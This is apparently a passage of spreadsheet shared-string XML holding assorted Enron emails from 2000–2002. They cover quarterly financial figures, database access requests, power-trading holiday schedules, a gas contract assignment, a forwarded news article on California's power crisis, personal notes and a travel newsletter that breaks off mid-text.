  </si>
  <si>
    <t xml:space="preserve">Please make sure your numbers go through me or Stan before we give them to Corp. Corp's request for these things should be coming through me in the future.   Rod and I are meeting with Stan on Monday, October 22.  We would like to discuss your 4th Q numbers then if possible._x000D_
_x000D_
Let me know._x000D_
_x000D_
Thanks_x000D_
_x000D_
Tracy_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Sommers, Jeffrey E.  _x000D_
Sent:	Tuesday, October 16, 2001 10:18 AM_x000D_
To:	Lindsey, Mark E.; Schwarzbach, Stephen_x000D_
Cc:	Tran, Agatha; Hughes, James A.; Hayslett, Rod; Geaccone, Tracy_x000D_
Subject:	EGAS 4th Qtr_x000D_
_x000D_
_x000D_
Mark,_x000D_
_x000D_
In response to your voicemail this morning, this is EGAS 4th Qtr per the 2nd CE.  It has been adjusted to pull out the items that have been transferred out of EGAS since the 2nd CE  ( Azurix International and South America Merchant ) and the transfer in of European Assets and the Middle East.   This does NOT include EPower which I understand will be transferred from Europe to EGAS in the 4th Qtr.   We are currently working on our 3rd CE and will send you those numbers when we are done._x000D_
_x000D_
Sommers  &lt;&lt; File: EGAS4thqtr.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 05:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: eRequests</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon Ms. Jones,_x000D_
_x000D_
No request were found for Angela Davis, Linda Sietzema and Sharon Crawford; _x000D_
if you have the request numbers, please provide them (sometimes eRequest will _x000D_
not find the client by name).  The request for Marcus Nettelton appears OK._x000D_
_x000D_
Have a nice day,_x000D_
Gary Sta. Maria_x000D_
_x000D_
_x000D_
From: Tana Jones@ECT on 03/20/2001 10:32 AM_x000D_
To: Enron Messaging Security/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: eRequests   _x000D_
_x000D_
I just did a request to get Angela Davis in the Houston Office and Linda _x000D_
Sietzema and Sharon Crawford in the Calgary offices edit access to the _x000D_
Financial Trading Agreement Database.  I also requested that Marcus Nettelton _x000D_
get edit access to the ENA Legal Online Trading Database.  I'm not sure if I _x000D_
did the "erequest" all ok.  Can you check to make sure your got all four?  _x000D_
Thanks!_x000D_
_x000D_
_x000D_
_x000D_
	Enron Messaging Security@ENRON_x000D_
	02/27/2001 01:12 PM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: eRequests 20721 &amp; 20740_x000D_
_x000D_
Good afternoon,_x000D_
_x000D_
Please submit an eRequest for the access request (all 5-7 people can be _x000D_
placed on one request)._x000D_
_x000D_
To view the Group members, please open the ECT Address book, click on Groups, _x000D_
then double-click on the name of the group.  Please let us know if there are _x000D_
any questions._x000D_
_x000D_
_x000D_
Have a nice day,_x000D_
Gary Sta. Maria_x000D_
_x000D_
_x000D_
From: Tana Jones@ECT on 02/27/2001 11:31 AM_x000D_
To: Enron Messaging Security/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: eRequests 20721 &amp; 20740  _x000D_
_x000D_
ECT HOU_LN1/ECT_x000D_
Legal\new_swp.nsf_x000D_
_x000D_
I will be having about 5-7 other people that I will need added to this _x000D_
database.  Should I send these requests back directly to you, or do them _x000D_
through the system as well?_x000D_
_x000D_
Also, there are two ways of getting edit access through this database.  One _x000D_
is for employees of Legal, who can then enter Legal comments, and the other _x000D_
is for employees of Credit, who can then enter Credit comments.  Do you see _x000D_
that choice?  Is there some way for me to verify which employees of Legal and _x000D_
which employees of Credit have what access?  I know that some employees of _x000D_
Credit have Legal access by mistake.  Can I get lists of the Legal and Credit _x000D_
breakdowns?_x000D_
_x000D_
_x000D_
_x000D_
	Enron Messaging Security@ENRON_x000D_
	02/27/2001 11:17 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: eRequests 20721 &amp; 20740_x000D_
_x000D_
Good morning,_x000D_
_x000D_
Please provide the path to the Financial Trading Agreement database.  The _x000D_
information can be found by right-clicking on the database icon, then _x000D_
selecting Database properties.  The Server and File name will be under the _x000D_
Basic tab._x000D_
_x000D_
Have a nice day,_x000D_
Gary Sta. Maria_x000D_
Enron Messaging Security_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Nov 2001 08:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: holiday rules</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Walker, Chris  _x000D_
Sent:	Tuesday, November 06, 2001 10:20 AM_x000D_
To:	Platter, Phillip; Mallory, Chris_x000D_
Cc:	Meredith, Kevin; Hoang, Charlie_x000D_
Subject:	holiday rules_x000D_
_x000D_
Let us know if these dates are what you want for all of west power:_x000D_
_x000D_
	Wed	Thurs	Fri	_x000D_
Day Ahead Pk	8-9	10	12-13	_x000D_
Day Ahead +1 Pk	10	12-13	14	_x000D_
BOM Pk	10-EOM	12-EOM	14-EOM	_x000D_
				_x000D_
Day Ahead Offpk	8-9	10-11	12-13	_x000D_
Day Ahead +1 Offpk	10-11	12-13	14	_x000D_
BOM Offpk	10-EOM	12-EOM	14-EOM	_x000D_
_x000D_
_x000D_
Chris_x000D_
713-853-7533</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 07:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vikram.pandit@msdw.com', 'deborah.marino@msdw.com'})</t>
  </si>
  <si>
    <t>Here is a copy of the original email sent to you:_x000D_
_x000D_
_______________________________________________________________________________x000D_
____x000D_
I am contacting you on the recommendation of Pug Winokur, who is on our Board _x000D_
of Directors.  Enron has formed an Advisory Council which consists of _x000D_
academicians, public policy thinkers and media, together with Enron _x000D_
executives.  I would like to invite you to address the group on E-Commerce _x000D_
issues at our next meeting (Friday, September 8th in Houston)._x000D_
_x000D_
Attached is a list of our Advisory Council members._x000D_
_x000D_
_x000D_
_x000D_
I think you will find this group interesting and thought provoking._x000D_
_x000D_
Please contact me at your earliest convenience at 713-853-1586._x000D_
___________________________________________________________________________x000D_
_x000D_
DEBORAH:   Please fax me Mr. Pandit's bio.  My fax number is 713-646-8160._x000D_
_x000D_
Also, would you email his presentation when you have it available.  Most _x000D_
presenters use Power Point - but if you have different needs, please give me _x000D_
a call at 713-853-1808.  The person to email the presentation to is Russell _x000D_
Mitchell.  His email address is     russell.mitchell@enron.com_x000D_
_x000D_
_x000D_
Thanks for your assistance.</t>
  </si>
  <si>
    <t>Mon, 26 Jun 2000 03:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'knowledge.survey@enron.com'})</t>
  </si>
  <si>
    <t>Knowledge Management Survey</t>
  </si>
  <si>
    <t xml:space="preserve">Background_x000D_
At the Napa meeting in December, one of the Working Groups established was=_x000D_
=20_x000D_
for Knowledge and Information Management.  The group=01,s mission is to dev=_x000D_
elop=20_x000D_
a system for capturing and distributing knowledge and information.  The pil=_x000D_
ot=20_x000D_
version of the group=01,s efforts is tentatively scheduled to be launched i=_x000D_
n=20_x000D_
September 2000._x000D_
_x000D_
Overview_x000D_
The product is a web based application to store knowledge and information,=_x000D_
=20_x000D_
initially for Public Affairs as a pilot program, then as a system for all o=_x000D_
f=20_x000D_
Enron.  The system will be populated and maintained by users.  The goal is =_x000D_
be=20_x000D_
able to find specific data with as few =01&amp;clicks=018 as possible, so data =_x000D_
will be=20_x000D_
searchable and linkable between documents and topics.  Each document will b=_x000D_
e=20_x000D_
summarized, and will be =01&amp;sanitized=018 to prevent confidential data from=_x000D_
 being=20_x000D_
distributed from the system.  Input to the system will be subject to a revi=_x000D_
ew=20_x000D_
process.  Documents in the system will include white-papers, presentations,=_x000D_
=20_x000D_
process histories and/or summaries, articles, links to external sites, and=_x000D_
=20_x000D_
any other information identified as =01&amp;knowledge=018 through this survey a=_x000D_
nd as=20_x000D_
the system evolves that would be valuable to others in the company.  (See=_x000D_
=20_x000D_
attached diagram.)_x000D_
_x000D_
Request_x000D_
For the initial population of the system, we request your assistance in=20_x000D_
developing a directory of Public Affairs experts who have specific knowledg=_x000D_
e=20_x000D_
and can best communicate it.  To do so, we ask for your input through the=_x000D_
=20_x000D_
attached survey.  We will contact the identified experts directly to solici=_x000D_
t=20_x000D_
their submissions to the system.  Your participation and recommendations ar=_x000D_
e=20_x000D_
essential in making this system a shared success.  Thank you in advance for=_x000D_
=20_x000D_
your support!_x000D_
_x000D_
_x000D_
_x000D_
Please return your response to Elizabeth Linnell and Ricardo Charvel.  We'r=_x000D_
e=20_x000D_
looking for as many responses as possible before July 5 so that we can revi=_x000D_
ew=20_x000D_
them during our next working group meeting.  Any and all responses will be=_x000D_
=20_x000D_
appreciated!_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 15:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ????</t>
  </si>
  <si>
    <t xml:space="preserve">I will buy....How's Thurs.  - Lunch </t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 08:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>588194</t>
  </si>
  <si>
    <t>This deal is in as firm energy with an SP delivery point._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 18:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.kinsey@enron.com', 'mark.schrab@enron.com'})</t>
  </si>
  <si>
    <t>Crestar AOS assignment to BP</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
---------------------- Forwarded by Patrice L Mims/HOU/ECT on 04/03/2001 03:13 PM ---------------------------_x000D_
_x000D_
_x000D_
"Bruce Kohrs" &lt;Bruce_Kohrs@keyspancanada.com&gt; on 04/03/2001 01:06:43 PM_x000D_
To:	dan.j.hyvl@enron.com, &lt;patrice.l.mims@enron.com&gt;_x000D_
cc:	hunters.shively@enron.com, grant.oh@enron.com, Brian_Houghton/CRESTAR1/Crestar_Energy%Exchange &lt;Brian_Houghton@keyspancanada.com&gt;, Michael_Kleiner/CRESTAR1/Crestar_Energy%Exchange &lt;Michael_Kleiner@keyspancanada.com&gt;, "Jim Pearson" &lt;Jim_Pearson@keyspancanada.com&gt;, williakh@bp.com _x000D_
Subject:	Crestar AOS assignment to BP_x000D_
_x000D_
_x000D_
Dan, Grant Oh suggested I e-mail you directly to notify you of a change_x000D_
that BP needs included. BP states they need to have the volumes/contract_x000D_
number information back from Enron via e-mail by 9:45am MST in order to_x000D_
place nominations by 10:30am MST for the Timely Cycle. If for whatever_x000D_
reason Enron cannot provide the volume/contract number information by_x000D_
9:45am or Enron fails to take the scheduled volume agreed to at 9:00am; and_x000D_
BP incurs any penalty costs including the price difference between the_x000D_
Enron price and the replacement price, then Enron should be liable for_x000D_
these costs NOT Gulf. I suggest the following options:_x000D_
_x000D_
1) Put back in the default contract number in the Enron/Crestar agreement_x000D_
as we had last week, this way if Enron fails to notify by 9:45am, then_x000D_
Crestar/BP can nominate to the default contract number and Enron can change_x000D_
the contract numbers internally._x000D_
2) Add a clause to either the Enron agreement or the Gulf assignment_x000D_
agreement to state if Enron fails to inform and/or take, then any penalty_x000D_
costs/price difference incurred by Crestar/BP shall be passed onto Enron._x000D_
_x000D_
Please advise what Enron's position is and how we should proceed._x000D_
------_x000D_
_x000D_
Bruce Kohrs_x000D_
Phone: (403)205-7684_x000D_
Fax: (403)266-1947_x000D_
e-mail:bruce_kohrs@keyspancanada.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 03:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>HPL Nom for April 6, 2001</t>
  </si>
  <si>
    <t>(See attached file: HPLN0406.xls)_x000D_
_x000D_
 - HPLN0406.xls</t>
  </si>
  <si>
    <t>Mon, 1 Apr 2002 13:12:37 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'doug.sewell@enron.com'})</t>
  </si>
  <si>
    <t>FW: Duke $</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Veariel, Robin _x000D_
Sent: Friday, March 29, 2002 9:03 AM_x000D_
To: Parks, Joe_x000D_
Subject: Duke $_x000D_
_x000D_
_x000D_
03/29/02            FINANCIAL STATUS FOR     03/29/02  10:02         PAGE   2_x000D_
ACCOUNT:  40781075      ENRON N.A. CORP-ENA CASH SRV_x000D_
_x000D_
20208846139 SAME DAY CR TRANSFER                                   2,735,550.05_x000D_
            GID:C0020880869301_x000D_
            CHP0073745_x000D_
            REF:      0209100088JO_x000D_
            BENEF REF:CAP OF 02/03/29_x000D_
            ORDER:    009102771343 DUKE ENERGY FIELD SER_x000D_
            VICES, LP. C/O DUKE ENERGY FIELD SERVICES IN_x000D_
            C P O BOX 5493 DENVER CO 80217-_x000D_
            ORIG BK:  0002 JPMORGAN CHASE BANK_x000D_
            DETAILS:PAYMENT TO ENRON FOR SETTLEMENT_x000D_
            OF STORAGE FEES DUE POST BANKRUPTCY._x000D_
            INSTRUCT DATE:03/29/02 ADVICE TYPE:NONE</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 06:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'veronica_brock@hotmail.com'})</t>
  </si>
  <si>
    <t>Cooling System</t>
  </si>
  <si>
    <t>Mark,_x000D_
_x000D_
Please remember to call the service tech in reference to the cooling system_x000D_
in the apartment.  Thanks!_x000D_
_x000D_
Veronica B._x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com</t>
  </si>
  <si>
    <t>Tue, 26 Jun 2001 03:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">I thought it would be useful for you to have the attached. </t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 06:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'thomasandkaren@home.com'})</t>
  </si>
  <si>
    <t>Re: New Baby</t>
  </si>
  <si>
    <t>Great to hear.  Congratulations to the both of you.  I'll talk to you_x000D_
soon._x000D_
_x000D_
Kevin and Lisa</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 15:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marty.sunde@enron.com', 'kevin.hughes@enron.com', 'tony.spruiell@enron.com', 'kathryn.corbally@enron.com', 'gordon.savage@enron.com', 'erika.dupre@enron.com', 'kathy.bass@enron.com', 'richard.zdunkewicz@enron.com', 'angela.schwarz@enron.com', 'richard.sanders@enron.com', 'paul.kaufman@enron.com', 'jeremy.blachman@enron.com', 'harry.kingerski@enron.com', 'mark.muller@enron.com', 'tanya.leslie@enron.com', 'leticia.botello@enron.com', 'james.lewis@enron.com', 'james.wright@enron.com', 'greg.wolfe@enron.com', 'robert.williams@enron.com', 'jeff.messina@enron.com', 'sandra.mccubbin@enron.com', 'eric.melvin@enron.com', 'neil.hong@enron.com', 'dorothy.youngblood@enron.com', 'triley@enron.com', 'frank.vickers@enron.com', 'harold.buchanan@enron.com', 'karen.denne@enron.com', 'william.bradford@enron.com', 'mpalmer@enron.com', 'michael.etringer@enron.com', 'rosalinda.tijerina@enron.com', 'ginger.dernehl@enron.com', 'susan.mara@enron.com', 'scott.stoness@enron.com', 'ted.murphy@enron.com', 'dan.leff@enron.com', 'beverly.aden@enron.com', 'paula.warren@enron.com', 'wanda.curry@enron.com', 'steve.walker@enron.com', 'chris.foster@enron.com', 'vicki.sharp@enron.com', 'tasha.lair@enron.com', 'kathy.dodgen@enron.com', 'alan.comnes@enron.com', 'terri.greenlee@enron.com', 'tim.belden@enron.com', 'marsha.suggs@enron.com', 'richard.leibert@enron.com', 'michael.mann@enron.com', 'sarah.novosel@enron.com', 'gayle.muench@enron.com', 'don.black@enron.com', 'rita.hennessy@enron.com', 'scott.gahn@enron.com', 'michelle.cisneros@enron.com', 'craig.sutter@enron.com', 'christina.liscano@enron.com', 'fran.deltoro@enron.com', 'meredith.eggleston@enron.com', 'cathy.corbin@enron.com', 'vladimir.gorny@enron.com', 'ken.gustafson@enron.com', 'neil.bresnan@enron.com', 'skean@enron.com', 'iris.waser@enron.com', 'robert.badeer@enron.com', 'dennis.benevides@enron.com', 'richard.shapiro@enron.com', 'sharon.dick@enron.com', 'edward.sacks@enron.com', 'carol.moffett@enron.com', 'leasa.lopez@enron.com', 'debora.whitehead@enron.com', 'douglas.huth@enron.com', 'roger.yang@enron.com', 'dirk.vanulden@enron.com', 'christopher.calger@enron.com', 'james.steffes@enron.com', 'jubran.whalan@enron.com', 'evan.hughes@enron.com', 'jess.hewitt@enron.com', 'joe.hartsoe@enron.com', 'brenda.barreda@enron.com', 'bill.votaw@enron.com'})</t>
  </si>
  <si>
    <t>Judge Orders Supplier To Continue Selling Power To Calif</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 02/06/2001 11:32 PM -----_x000D_
_x000D_
	Alan Comnes@ECT_x000D_
	02/06/2001 09:30 PM_x000D_
		_x000D_
		 To: Angela Schwarz/HOU/EES@EES@ENRON, Beverly Aden/HOU/EES@EES@ENRON, Bill _x000D_
Votaw/HOU/EES@EES@ENRON, Brenda Barreda/HOU/EES@EES@ENRON, Carol _x000D_
Moffett/HOU/EES@EES@ENRON, Cathy Corbin/HOU/EES@EES@ENRON, Chris H _x000D_
Foster/HOU/ECT@ECT, Christina Liscano/HOU/EES@EES@ENRON, Christopher F _x000D_
Calger/PDX/ECT@ECT, Craig H Sutter/HOU/EES@EES@ENRON, Dan _x000D_
Leff/HOU/EES@EES@ENRON, Debora Whitehead/HOU/EES@EES@ENRON, Dennis _x000D_
Benevides/HOU/EES@EES@ENRON, Don Black/HOU/EES@EES@ENRON, Dorothy _x000D_
Youngblood/HOU/ECT@ECT, Douglas Huth/HOU/EES@EES@ENRON, Edward _x000D_
Sacks/Corp/Enron@ENRON, Eric Melvin/HOU/EES@EES@ENRON, Erika _x000D_
Dupre/HOU/EES@EES@ENRON, Evan Hughes/HOU/EES@EES@ENRON, Fran _x000D_
Deltoro/HOU/EES@EES@ENRON, Gayle W Muench/HOU/EES@EES@ENRON, Ginger _x000D_
Dernehl/NA/Enron@ENRON, Gordon Savage/HOU/EES@EES@ENRON, Harold G _x000D_
Buchanan/HOU/EES@EES@ENRON, Harry Kingerski/NA/Enron@ENRON, Iris _x000D_
Waser/HOU/EES@EES@ENRON, James D Steffes/NA/Enron@ENRON, James W _x000D_
Lewis/HOU/EES@EES@ENRON, James Wright/Western Region/The Bentley _x000D_
Company@Exchange@ENRON, Jeff Messina/HOU/EES@EES@ENRON, Jeremy _x000D_
Blachman/HOU/EES@EES@ENRON, Jess Hewitt/HOU/EES@EES@ENRON, Joe _x000D_
Hartsoe/Corp/Enron@ENRON, Karen Denne/Corp/Enron@ENRON, Kathy _x000D_
Bass/HOU/EES@EES@ENRON, Kathy Dodgen/HOU/EES@EES@ENRON, Ken _x000D_
Gustafson/HOU/EES@EES@ENRON, Kevin Hughes/HOU/EES@EES@ENRON, Leasa _x000D_
Lopez/HOU/EES@EES@ENRON, Leticia Botello/HOU/EES@EES@ENRON, Mark S _x000D_
Muller/HOU/EES@EES@ENRON, Marsha Suggs/HOU/EES@EES@ENRON, Marty _x000D_
Sunde/HOU/EES@EES@ENRON, Meredith M Eggleston/HOU/EES@EES@ENRON, Michael _x000D_
Etringer/HOU/ECT@ECT, Michael Mann/HOU/EES@EES@ENRON, Michelle D _x000D_
Cisneros/HOU/ECT@ECT, mpalmer@enron.com@ENRON, Neil _x000D_
Bresnan/HOU/EES@EES@ENRON, Neil Hong/HOU/EES@EES@ENRON, Paul _x000D_
Kaufman/PDX/ECT@ECT, Paula Warren/HOU/EES@EES@ENRON, Richard L _x000D_
Zdunkewicz/HOU/EES@EES@ENRON, Richard Leibert/HOU/EES@EES@ENRON, Richard _x000D_
Shapiro/NA/Enron@ENRON, Rita Hennessy/NA/Enron@ENRON, Robert _x000D_
Badeer/HOU/ECT@ECT, Rosalinda Tijerina/HOU/EES@EES@ENRON, Sandra _x000D_
McCubbin/NA/Enron@ENRON, Sarah Novosel/Corp/Enron@ENRON, Scott _x000D_
Gahn/HOU/EES@EES@ENRON, Scott Stoness/HOU/EES@EES@ENRON, Sharon _x000D_
Dick/HOU/EES@EES@ENRON, skean@enron.com@ENRON, Susan J Mara/NA/Enron@ENRON, _x000D_
Tanya Leslie/HOU/EES@EES@ENRON, Tasha Lair/HOU/EES@EES@ENRON, Ted _x000D_
Murphy/LON/ECT@ECT, Terri Greenlee/NA/Enron@ENRON, Tim Belden/HOU/ECT@ECT, _x000D_
Tony Spruiell/HOU/EES@EES@ENRON, Vicki Sharp/HOU/EES@EES@ENRON, Vladimir _x000D_
Gorny/HOU/ECT@ECT, Wanda Curry/HOU/EES@EES@ENRON, William S _x000D_
Bradford/HOU/ECT@ECT, Jubran Whalan/HOU/EES@EES@ENRON, _x000D_
triley@enron.com@ENRON, Richard B Sanders/HOU/ECT@ECT, Robert C _x000D_
Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, _x000D_
dwatkiss@bracepatt.com@ENRON, rcarroll@bracepatt.com@ENRON, Donna _x000D_
Fulton/Corp/Enron@ENRON, gfergus@brobeck.com@ENRON, Kathryn _x000D_
Corbally/Corp/Enron@ENRON, Bruno Gaillard/EU/Enron@Enron, Linda _x000D_
Robertson/NA/Enron@ENRON, Ren, Lazure/Western Region/The Bentley _x000D_
Company@Exchange@ENRON, Michael Tribolet/Corp/Enron@Enron, Phillip K _x000D_
Allen/HOU/ECT@ECT, Christian Yoder/HOU/ECT@ECT, jklauber@llgm.com@ENRON, _x000D_
Tamara Johnson/HOU/EES@EES@ENRON, Mary Hain/HOU/ECT@ECT, Greg _x000D_
Wolfe/HOU/ECT@ECT, Jeff Dasovich/NA/Enron@Enron, Dirk vanUlden/Western _x000D_
Region/The Bentley Company@Exchange@ENRON, Steve Walker/SFO/EES@EES@ENRON, _x000D_
Mike D Smith/HOU/EES@EES@ENRON, Richard Shapiro/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Judge Orders Supplier To Continue Selling Power To Calif_x000D_
_x000D_
Good morning !_x000D_
_x000D_
Judge Orders Supplier To Continue Selling Power To Calif_x000D_
  _x000D_
02/06/2001 _x000D_
Dow Jones Energy Service _x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.) _x000D_
_x000D_
_x000D_
SACRAMENTO, Calif. (AP)--A U.S. judge Tuesday temporarily ordered an _x000D_
electricity supplier to continue selling power to the state, effectively _x000D_
extending an emergency federal directive. Two other suppliers agreed they _x000D_
would continue sales as well. _x000D_
_x000D_
_x000D_
U.S. District Judge Frank Damrell, citing the possibility of "obvious _x000D_
irreparable harm to the public," said Tuesday his temporary order requires _x000D_
Reliant Energy Services Inc. to continue sales at least until a further _x000D_
hearing on Wednesday._x000D_
_x000D_
_x000D_
Wholesalers AES Pacific Inc. and Dynegy Power Corp., not covered under the _x000D_
temporary injunction, said they would continue sales until that hearing as _x000D_
well. _x000D_
_x000D_
_x000D_
The suppliers provide enough electricity to serve 4 million homes. _x000D_
Electricity grid officials said losing that source could have produced _x000D_
rolling blackouts like the ones that hit the state twice last month. _x000D_
_x000D_
_x000D_
The Independent System Operator, which maintains the state's power grid, _x000D_
sought the restraining order on an emergency basis as the federal directive _x000D_
neared its midnight PST Tuesday expiration. _x000D_
_x000D_
_x000D_
President Bush had said his administration would not renew the orders, which _x000D_
were first issued by the Clinton administration and were extended by Spencer _x000D_
Abraham, Bush's energy secretary. _x000D_
_x000D_
_x000D_
Reliant filed a lawsuit against the system operator last week after receiving _x000D_
a letter it sent to 140 power generators asking them to agree to continue _x000D_
selling power after the expiration. The Houston-based company said it should _x000D_
not have to bear the cost of California's energy crisis. _x000D_
_x000D_
_x000D_
Reliant representatives did not immediately return calls for comment Tuesday._x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
  _x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. </t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 01:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.haedicke@enron.com', 'james.derrick@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Mark/Jim_x000D_
_x000D_
Attached is an email that I received from A&amp;K.  While I believe that it does _x000D_
not currently present a conflict, (i) it may present a conflict sometime in _x000D_
the future if we run into environmental problems in connection with our _x000D_
development efforts in Florida or (ii) for some other reason beyond my _x000D_
limited scope of knowledge.  Please advise regarding how I should respond.  _x000D_
Thanks._x000D_
_x000D_
Stuart_x000D_
_x000D_
----- Forwarded by Stuart Zisman/HOU/ECT on 03/01/2001 09:18 AM -----_x000D_
_x000D_
	"Bohannon, Paul" &lt;paulbohannon@akllp.com&gt;_x000D_
	02/28/2001 09:37 AM_x000D_
		 _x000D_
		 To: "Stuart Zisman (E-mail)" &lt;stuart.zisman@enron.com&gt;_x000D_
		 cc: "Runnels, David" &lt;davidrunnels@akllp.com&gt;, "THOMAS STARNES (E-mail)" _x000D_
&lt;START@mailman.enron.com&gt;_x000D_
		 Subject: _x000D_
_x000D_
_x000D_
Stuart,_x000D_
_x000D_
 Just a note that the Florida Department of Environmental_x000D_
Protection has requested A&amp;K to represent it in some litigation against_x000D_
Coastal.  The case is in Washington, D.C.  and does not involve power_x000D_
plant issues.  Although niether I nor Sara will be involved in the_x000D_
matter, Tom Starnes of our Environmental Section will be directly_x000D_
responsible._x000D_
_x000D_
 I would appreciate your indication of whether this will be a_x000D_
conflicts problem.  Feel free to do so by return email._x000D_
_x000D_
 Thanks, Stuart._x000D_
_x000D_
Paul Bohannon_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 05:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>status report</t>
  </si>
  <si>
    <t xml:space="preserve">Mark, please let me know if this format suffices -- if so I will update this _x000D_
for you every Monday -- thanks, Bob_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 13:15:48 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.king@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'julie.davidson@enron.com'})</t>
  </si>
  <si>
    <t>Julie,_x000D_
_x000D_
You must have the wrong Jeff King.  I'm in east power trading.  Sorry!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Davidson, Julie  _x000D_
Sent:	Friday, October 19, 2001 2:16 PM_x000D_
To:	King, Jeff_x000D_
Subject:	_x000D_
_x000D_
Hi Jeff._x000D_
_x000D_
Long time no talk.  I talked to Rou Chandler this week, and we may be getting a group together to play tomorrow evening.  Would love for you to join us.  Call me if you would like to come!_x000D_
_x000D_
Julie</t>
  </si>
  <si>
    <t>Mon, 14 Aug 2000 01:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tammy.shepperd@enron.com', 'john.lavorato@enron.com', 'mark.frevert@enron.com', 'edward.baughman@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>West Mid Market QBR</t>
  </si>
  <si>
    <t>Just a reminder.....West Mid Market QBR will be held this week:_x000D_
_x000D_
  DATE:   FRIDAY, AUGUST 18, 2000_x000D_
  TIME:   1:00 PM TO 4:00 PM_x000D_
  PLACE:   EB3321_x000D_
_x000D_
I will look forward to seeing you there.</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 12:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jtholt@ect.enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Jane,_x000D_
_x000D_
Now is a great time to be a Travelocity member. This month, we have _x000D_
another great array of Deals to help stretch your travel dollars, _x000D_
from free nights in the Bahamas and Hawaii to low rates on rental _x000D_
cars all over the U.S. We're also introducing something new: The _x000D_
Travelocity Preferred Traveler Program can help you save money every _x000D_
time you travel--It's the ultimate upgrade! Read on for more _x000D_
information on this exciting new program. _x000D_
_x000D_
Featured this Week_x000D_
? Rates from $599 on Eastern and Western Caribbean Cruises!_x000D_
? Win a Night on the Town for Six with Travelocity Preferred Traveler_x000D_
Vacations_x000D_
? 7th Night FREE at Sheraton Grand Resort in Nassau!_x000D_
? 5th Night FREE at the Pacific Beach in Oahu!_x000D_
Cruises_x000D_
? Balcony Staterooms on Weeklong Southern Caribbean Sailings_x000D_
??from $747!_x000D_
? Sail to Bermuda from Boston for Only $549!_x000D_
? 12-Night Sailings through Northern Europe from $899!_x000D_
Hotels_x000D_
? Courtyard by Marriott_x000D_
? Hotel Pennsylvania_x000D_
? Renaissance World Gate_x000D_
Air_x000D_
? Fly Aeromexico, Mexicana, or Aero California and Put Plenty of_x000D_
??Pesos in the Bank!_x000D_
? Travel on National Airlines and Save up to 15%_x000D_
? Save Big on Your Next Flight to Canada!_x000D_
Car_x000D_
? Budget Rent-a-Car_x000D_
Special Offers_x000D_
? Hawaii_x000D_
? Limocenter.com_x000D_
Exclusive Offer_x000D_
? Travelocity World MasterCardc_x000D_
Deals and Rewards_x000D_
? Travel Savings with the Travelocity Preferred Traveler Program_x000D_
Site News_x000D_
? Webby Awards_x000D_
? Free Issue of Travelocity Magazine_x000D_
Fare Watcher _x000D_
Traveler Reviews _x000D_
Travelocity Store _x000D_
_x000D_
***TRAVELER REVIEWS***_x000D_
Traveler Reviews_x000D_
Whether you've just had the perfect weekend away in Anaheim at _x000D_
Disneyland, or you're searching for the best place to stay in San _x000D_
Antonio or Victoria, Traveler Reviews are for you. Get the insider's _x000D_
point of view from someone who has been there, or share your _x000D_
experience with fellow globetrotters with Travelocity's _x000D_
